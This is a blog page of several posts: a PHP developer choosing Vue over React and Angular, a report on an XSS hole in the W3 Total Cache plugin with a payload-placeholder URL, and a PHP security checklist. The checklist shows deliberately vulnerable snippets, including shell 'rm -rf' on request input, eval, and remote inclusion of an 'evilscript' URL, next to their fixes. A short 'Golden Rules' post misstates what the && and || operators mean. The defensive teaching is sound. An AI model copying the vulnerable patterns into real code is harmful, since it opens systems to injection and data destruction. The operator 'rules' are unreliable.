Showing posts with label Tech Updates. Show all posts

Moving To Javascript Development

Over the last couple of years there has been a growing trend in web development: a move away from traditional back-end development towards front-end development using Javascript.
This has been helped by the rise of NodeJS in web applications, allowing Javascript to slowly but surely take over the world.
For many years PHP has been the leading web language; whether you like it or not, its market share has always won out. It has now been overtaken by Javascript, and it's easy to see why.
It moves away from the traditional web development approach of having to hire
  • Frontend developer - Traditionally just converted PSDs to HTML and CSS
  • Backend developer - PHP, Ruby or ASP.net, coding the link between the front-end and the server
  • Devops developers - To handle the server construction
  • Mobile developers - Creating the iOS and Android apps
  • Desktop application developers
In the current day Javascript developers can handle all these areas of development. Frontend development is no longer just processing HTML and CSS; you can build the entire product in Javascript. It's used to handle events on your frontend, Javascript then becomes the API to process the data, storing it in JSON, NodeJS is now your web server, and using something like React Native you can create native mobile apps in Javascript.
Now companies no longer have to hire 4 specialist developer positions, as these can all be done by a Javascript developer. This shift from hiring 4 specialist developers to hiring 4 Javascript developers will not only massively improve the process of development but the speed of development too. No longer does each stage have to wait for a dependency from another developer in a different section of the app; each developer can cover all areas of the application.
You can see that if you're a Javascript developer you have some good years ahead of you.
I've been a PHP developer for many years and I can see the direction that the web is heading to be more Javascript development and away from traditional development processes.
So it's time to change my development practices and learn more about Javascript development. I've been using Javascript for over 15 years but have never used Javascript to build an entire website. So the question I ask when learning a new language/process is where do I start? How do I go about learning frontend development with Javascript?

Where To Start With Javascript Development?

This has been the hardest question to answer with Javascript development as there are so many good frameworks out there at the moment, which one do you choose?
This just names a few of the frameworks.
Which one do you choose?
I asked this question on Twitter, but I didn't want to just say "what framework should I learn?" I did some research and saw that the 2 main frameworks used are Angular and React. As these were the biggest, with the largest communities and the highest job prospects, I wanted to go with one of these. Therefore I asked the question: which framework should I learn, Angular or React?

The replies I had to this tweet were very surprising; there was a mix between Angular and React, with React coming slightly ahead. The surprising part was the amount of people suggesting vue.js over any other framework.
Looking into Vue.js on GitHub you can see how quickly it is gaining popularity and should be taken seriously. But looking at employability, the main contenders are Angular and React.
While searching for a comparison of the two frameworks I found the project TodoMVC, a GitHub repository that builds a simple To-do application using multiple different frameworks. This is a great way of comparing the different frameworks while they're performing the same actions.
To see the code of the React Todo project you can view it here.
To see the code of Angular2 Todo project you can view it here.
To see the code of Vue.js Todo project you can view it here.

Angular Vs React

As I'm not in a good position to compare these two frameworks, I've linked to the resources I used to make my decision.
The main difference between these two is that Angular is a Javascript framework and React is a Javascript library, which means it's the difference between buying a complete computer compared with buying the parts to build your computer.
Going on what I've read in the above articles about both Angular 2 and React, I've decided React is the better framework for me to learn. But then I thought about what people were saying on Twitter and how most people replied with VueJs, so I had to consider this in my choice.

VueJs

Vue (pronounced /vjuː/, like view) is a progressive framework for building user interfaces. Unlike other monolithic frameworks, Vue is designed from the ground up to be incrementally adoptable. The core library is focused on the view layer only, and is very easy to pick up and integrate with other libraries or existing projects. On the other hand, Vue is also perfectly capable of powering sophisticated Single-Page Applications when used in combination with modern tooling and supporting libraries.
If you are an experienced frontend developer and want to know how Vue compares to other libraries/frameworks, check out the Comparison with Other Frameworks.
Compared with the other frameworks Vue looks very powerful, easy to learn and fast.
When using a language the size of the community is very important; the more people that use it, the easier it is to find support. Looking at the top Javascript frameworks on GitHub you can see that Vue is gaining a lot of popularity.
As you can see from the image above, Vue is the 3rd most popular framework on GitHub behind Angular and React. When you consider the fact that Vue hasn't been around as long as the other two, you can see it's going to catch up quickly.
Another point you need to look into when picking a language/framework is the progression of the product; if it hasn't been updated for a couple of years then you don't really want to be using it. Vue has recently released version 2 of the framework, increasing its speed.

Laravel

From Laravel 5.3 Vue is included in the build and will be the focus for creating the front-end of your application. This is just the start of using Vue, but it could mean a move away from Blade, with Vue replacing it.
This makes Laravel a very good choice to use for the API of your app, with Vue consuming the API.
With Laravel making this move to include it in the build you will see a lot more people taking up Vue for their applications as opposed to React or Angular. For these reasons I've chosen to start learning Vue, as I believe in the coming years it will gain more and more popularity in front-end development.
What are your opinions on the different frameworks?

High Risk XSS Vulnerability Discovered in W3 Total Cache Plugin

WP Media is reporting a high risk XSS vulnerability in W3 Total Cache that the company learned about from El Rincón de Zerial’s security blog. The plugin is currently active on more than one million WordPress sites.
This particular vulnerability is found within the plugin’s support form that is embedded in the admin, according to WP Media’s description:
This page can be reached directly using a URL with params, then the params will fill the form.
The params are not escaped when printed on the page, leading to an XSS vulnerability.
Example of XSS URL to be avoided: https://example.com/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&request_id=PAYLOAD
Then replace PAYLOAD with a malicious code.
According to Zerial, in order to exploit the vulnerability, an administrator or user with sufficient permissions must have an active session.
Because the threat is already public with no patch available, the vulnerability’s DREAD score ranks it as High Risk. It’s also easily exploitable and could potentially give an attacker the ability to inject code into the admin area and gain access to security tokens, cookies, and private data.
W3 Total Cache was updated six months ago with a fix for two security issues. The last major update, 0.9.4, was released in 2014. After many users began to wonder if the plugin was abandoned, we spoke with author Frederick Townes in March to learn the status of W3 Total Cache. He said that development and other operations have been ongoing and that his team is working towards officially leaving beta and moving to a 1.0 release. No major updates have been issued and Townes’ company blog has remained silent.
At this point, the only option users have is to disable the plugin or use an account with author or editor permissions instead of the administrator account. The plugin’s author has been contacted about the vulnerability but there is no security update available via WordPress.org yet.

Golden Rules of programming


1. The AND operator is used when we use (=) and the operator OR is used when we use (!=)
2. True ( || )     False ( && )

Comments urs.

How to Secure PHP Web Applications and Prevent Attacks?

As a developer you must know how to build a secure and bulletproof application. Your duty is to prevent security attacks and secure your application.

Checklist of PHP and Web Security Issues

Make sure you have these items sorted out when deploying your application into a production environment:
  1. ✔ Cross Site Scripting (XSS)
  2. ✔ Injections
  3. ✔ Cross Site Request Forgery (XSRF/CSRF)
  4. ✔ Public Files
  5. ✔ Passwords
  6. ✔ Uploading Files
  7. ✔ Session Hijacking
  8. ✔ Remote File Inclusion
  9. ✔ PHP Configuration
  10. ✔ Use HTTPS
  11. ✔ Things Not Listed

Cross Site Scripting (XSS)

An XSS attack happens when client-side code (usually JavaScript) gets injected into the output of your PHP script.
// GET data is sent through URL: http://example.com/search.php?search=
$search = $_GET['search'] ?? null;
echo 'Search results for '.$search;

// This can be solved with htmlspecialchars
$search = htmlspecialchars($search, ENT_QUOTES, 'UTF-8');
echo 'Search results for '.$search;
  • ENT_QUOTES is used to escape single and double quotes besides HTML entities
  • UTF-8 is used for pre PHP 5.4 environments (now it is the default). In some browsers some characters might get past the htmlspecialchars() call if the wrong charset is assumed.
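The W3 Total Cache report earlier on this page is the same pattern: URL parameters copied into a form without escaping. The example below (added here, not code from the original post or from the plugin) prefills a support form from the query string while escaping each value for the context it lands in; the field names and the request types are constructed for the illustration.

```php
<?php
// Added example: prefilling a form from URL parameters safely.
declare(strict_types=1);

// Escape for HTML text and for double-quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Escape for a value embedded inside a <script> block: json_encode with the
// JSON_HEX_* flags turns <, >, &, ' and " into \uXXXX sequences.
function eJs(string $value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// Only accept a known request type; anything else falls back to the default.
function requestType(array $query): string
{
    $allowed = ['bug_report', 'feature_request', 'question'];   // constructed list
    $type = $query['request_type'] ?? 'question';
    return in_array($type, $allowed, true) ? $type : 'question';
}

function renderSupportForm(array $query): string
{
    $type = requestType($query);
    $requestId = (string)($query['request_id'] ?? '');
    $options = '';
    foreach (['bug_report', 'feature_request', 'question'] as $opt) {
        $selected = $opt === $type ? ' selected' : '';
        $options .= '<option value="' . e($opt) . '"' . $selected . '>' . e($opt) . '</option>';
    }
    return '<form method="post" action="/support">'
        . '<select name="request_type">' . $options . '</select>'
        . '<input type="text" name="request_id" value="' . e($requestId) . '">'
        . '<script>var requestId = ' . eJs($requestId) . ';</script>'
        . '</form>';
}

// Constructed sample input of the kind the advisory describes: a value that
// tries to close the attribute and start a script tag.
$sample = ['request_type' => 'bug_report', 'request_id' => '"><script>alert(1)</script>'];
echo renderSupportForm($sample), PHP_EOL;
```

In the rendered output the quote and angle brackets appear as entities inside the attribute and as \u sequences inside the script block, so the browser treats them as data rather than markup.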

Injections

SQL Injection

When accessing databases from your application, an SQL injection attack can happen by injecting malicious SQL fragments into your existing SQL statement.

Directory Traversal (Path Injection)

A directory traversal attack is also known as a ../ (dot, dot, slash) attack. It happens when the user supplies input file names and can traverse to the parent directory. Data can be set as index.php?page=../secret or /var/www/secret or something more catastrophic:
$page = $_GET['page'] ?? 'home';

require $page;
// or something like this
echo file_get_contents('../pages/'.$page.'.php');
In such cases you must check for attempts to access a parent or remote folder:
// Checking if the string contains parent directory
if (strstr($_GET['page'], '../') !== false) {
    throw new \Exception("Directory traversal attempt!");
}

// Checking remote file inclusions
if (strstr($_GET['page'], 'file://') !== false) {
    throw new \Exception("Remote file inclusion attempt!");
}

// Using whitelists of pages that are allowed to be included in the first place
$allowed = ['home', 'blog', 'gallery', 'catalog'];
$page = (in_array($page, $allowed)) ? $page : 'home';
echo file_get_contents('../pages/'.$page.'.php');
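Substring checks like the strstr() calls above miss variants such as backslashes, absolute paths or symlinks inside the pages folder. The example below (added here, not from the original post) resolves the requested name with realpath() and refuses anything that does not end up inside the pages directory; the temporary pages folder and its files are constructed for the demonstration.

```php
<?php
// Added example: resolve a page name and confirm it stays inside the pages directory.
declare(strict_types=1);

// Returns the absolute path of the page file, or null if the request must be refused.
function resolvePage(string $pagesDir, string $page): ?string
{
    // Limit the character set first; dots are allowed so the containment check below is exercised.
    if (!preg_match('/\A[A-Za-z0-9._\/-]{1,64}\z/', $page)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false) {
        return null;   // base missing, or the page file does not exist
    }
    // realpath() has already resolved ../ and symlinks, so a prefix check is meaningful here.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed fixture: a temporary pages directory with one page and a file outside it.
$root = sys_get_temp_dir() . '/pages_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/home.php', '<?php echo "home";');
file_put_contents($root . '/secret.php', '<?php echo "secret";');

var_dump(resolvePage($root . '/pages', 'home'));          // path to home.php
var_dump(resolvePage($root . '/pages', '../secret'));     // resolves outside the base, refused
var_dump(resolvePage($root . '/pages', 'sub/../home'));   // resolves to home.php, allowed
var_dump(resolvePage($root . '/pages', 'missing'));       // no such file, refused
```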

Command Injection

Be careful when dealing with command-executing functions and data you don’t trust.
exec('rm -rf '.$_GET['path']);

Code Injection

Code injection happens when malicious code can be injected into the eval() function, so sanitize your data when using it:
eval('include '.$_GET['path']);

Cross Site Request Forgery (XSRF/CSRF)

Cross site request forgery, also called a one-click attack or session riding, is an exploit in which a user's browser is made to perform unwanted actions on a web application.
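A per-session anti-forgery token, as an added example (not from the original post): the token is generated once, embedded as a hidden field in every state-changing form, and compared with hash_equals() on submission. A plain array stands in for $_SESSION so the walk-through runs from the command line; in a web request you would pass $_SESSION and $_POST.

```php
<?php
// Added example: generate, embed and verify a CSRF token.
declare(strict_types=1);

// Create the token once per session; 32 random bytes gives a 64-character hex string.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to include in every POST form.
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// True only if the submitted token matches the one stored in the session.
function csrfValid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    if (!is_string($given) || $expected === '') {
        return false;
    }
    // hash_equals() compares in constant time, so the check leaks no timing information.
    return hash_equals($expected, $given);
}

// Constructed walk-through.
$session = [];
$form = '<form method="post" action="/delete-account">' . csrfField($session) . '</form>';

$goodPost   = ['csrf_token' => $session['csrf_token']];   // what the real form submits
$forgedPost = ['csrf_token' => str_repeat('0', 64)];      // what a cross-site form could only guess
$missing    = [];                                         // a form that never had the field

var_dump(csrfValid($session, $goodPost));
var_dump(csrfValid($session, $forgedPost));
var_dump(csrfValid($session, $missing));
```

Only the first check passes; a page on another origin cannot read the token out of the victim's session, so it cannot build a request that carries it.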

Public Files

Make sure to move all your application files, configuration files and similar parts of your web application into a folder that is not publicly accessible via the web application's URL. Some file types (for example .yml files) might not be processed by your web server, so users could view them online.
Example of good folder structure:
app/
  config/
    parameters.yml
  src/
public/
  index.php
  style.css
  javascript.js
  logo.png
Configure the web server to serve files from the public folder instead of your application root folder. The public folder contains the front controller (index.php). If the web server is misconfigured and fails to serve PHP files properly, only the source code of index.php will be visible to the public.

Passwords

When working with users’ passwords, hash them properly with the password_hash() function.

Uploading Files

A lot of security breaches happen where users can upload a file to the server. Make sure you go through all the vulnerabilities of uploading files, such as renaming the uploaded file, moving it to a publicly inaccessible folder, checking the file type and similar. Since there are a lot of issues to check here, more information is located in the separate FAQ:

Session Hijacking

Session hijacking is an attack where the attacker steals the session ID of a user. The session ID is sent to the server, where the $_SESSION array gets populated based on it. Session hijacking is possible through an XSS attack or if someone gains access to the folder on the server where session data is stored.
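A login step covering both the Passwords and the Session Hijacking sections, as an added example (not from the original post): password_verify() checks the stored hash, password_needs_rehash() upgrades hashes made with older cost settings, and session_regenerate_id(true) discards the session ID the browser held before authentication. The in-memory user list is constructed for the illustration.

```php
<?php
// Added example: verify a password, upgrade its hash if needed, and start a fresh session.
declare(strict_types=1);

// Constructed user store; in a real application the hash comes from the database.
$users = ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];

function verifyLogin(array &$users, string $name, string $password): bool
{
    if (!isset($users[$name]) || !password_verify($password, $users[$name])) {
        return false;
    }
    // Re-hash when the default algorithm or cost has changed since the hash was stored.
    if (password_needs_rehash($users[$name], PASSWORD_DEFAULT)) {
        $users[$name] = password_hash($password, PASSWORD_DEFAULT);
    }
    return true;
}

function startAuthenticatedSession(string $name): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // Cookie flags matching the php.ini session settings later on this page.
        session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
        session_start();
    }
    // A new ID after login means an ID captured or fixated before login no longer refers
    // to the authenticated session; true deletes the old session file as well.
    session_regenerate_id(true);
    $_SESSION['user'] = $name;
    $_SESSION['login_time'] = time();
}

// Constructed walk-through: correct password, wrong password, unknown user.
var_dump(verifyLogin($users, 'alice', 'correct horse battery staple'));
var_dump(verifyLogin($users, 'alice', 'wrong password'));
var_dump(verifyLogin($users, 'mallory', 'anything'));

// Session handling only makes sense under a web SAPI where cookies are sent.
if (PHP_SAPI !== 'cli' && verifyLogin($users, 'alice', 'correct horse battery staple')) {
    startAuthenticatedSession('alice');
}
```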

Remote File Inclusion

Remote file inclusion attack (RFI) means that attacker can include custom scripts:
$page = $_GET['page'] ?? 'home';

require $page . '.php';
In the above code $_GET['page'] can be set to a remote file: http://yourdomain.tld/index.php?page=http://example.com/evilscript
Make sure you disable this in your php.ini unless you know what you’re doing:
; Disable including remote files
allow_url_fopen = off
; Disable opening remote files for include(), require() and include_once() functions.
; If above allow_url_fopen is disabled, allow_url_include is also disabled.
allow_url_include = off

PHP Configuration

Always keep the installed PHP version updated. You can use versionscan to check for possible vulnerabilities of your PHP version. Update open source libraries and applications and maintain the web server.
Here are some of the important settings from php.ini that you should check out. You can also use iniscan to scan your php.ini files for best security practices.

Error Reporting

In your production environment you must always turn off displaying errors to screen. If errors occur in your application and they are visible to the outside world, an attacker can get valuable data for attacking your application. Set the display_errors and log_errors directives in the php.ini file:
; Disable displaying errors to screen
display_errors = off
; Enable writing errors to server logs
log_errors = on

Exposing PHP Version

The PHP version is visible in the HTTP headers. You might want to consider hiding it by turning off the expose_php directive, which stops the web server sending back the X-Powered-By header:
expose_php = off

Remote Files

In most cases it is important to disable access to remote files:
; disable opening remote files for fopen, fsockopen, file_get_contents and similar functions
allow_url_fopen = 0
; disable including remote files for require, include and similar functions
allow_url_include = 0

open_basedir

This setting defines one or more directories (subdirectories included) where PHP has access to read and write files. This includes file handling (fopen, file_get_contents) and also including files (include, require):
open_basedir = "/var/www/test/uploads"

Session Settings

  • session.use_cookies and session.use_only_cookies
    PHP is by default configured to store session data on the server and a tracking cookie on the client side (usually called PHPSESSID) with a unique ID for the session.
; in most cases you'll want to enable cookies for storing the session
session.use_cookies = 1
; disable changing the session id through the PHPSESSID parameter (e.g. foo.php?PHPSESSID=)
session.use_only_cookies = 1
session.use_trans_sid = 0
; reject any session ID from the user that the server did not generate and issue a new one
; (strict mode must be set to 1 to be active; 0 leaves session fixation possible)
session.use_strict_mode = 1
  • session.cookie_httponly
    If the attacker somehow manages to inject Javascript code for stealing the user’s current cookies (the document.cookie string), the HttpOnly cookie you’ve set won’t show up in the list.
session.cookie_httponly = 1
  • session.cookie_domain
    This sets the domain for which cookies apply. For wildcard domains you can use .example.com, or set it to the exact domain it should apply to. By default it is not set, so it is highly recommended that you set it:
session.cookie_domain = example.com
  • session.cookie_secure
    For HTTPS sites this ensures the session cookie is only ever sent over HTTPS. If you’re still not using HTTPS, you should consider it.
session.cookie_secure = 1

Use HTTPS

HTTPS is a protocol for secure communication over a network. It is highly recommended that you enable it on all sites. Read more about HTTPS in the dedicated FAQ: How to Install SSL Certificate and Enable HTTPS.

What is Next?

Above we’ve introduced many security issues. Security, attacks and vulnerabilities are continuously evolving. Take time to check some good resources to learn more about security, and turn this checklist into a habit: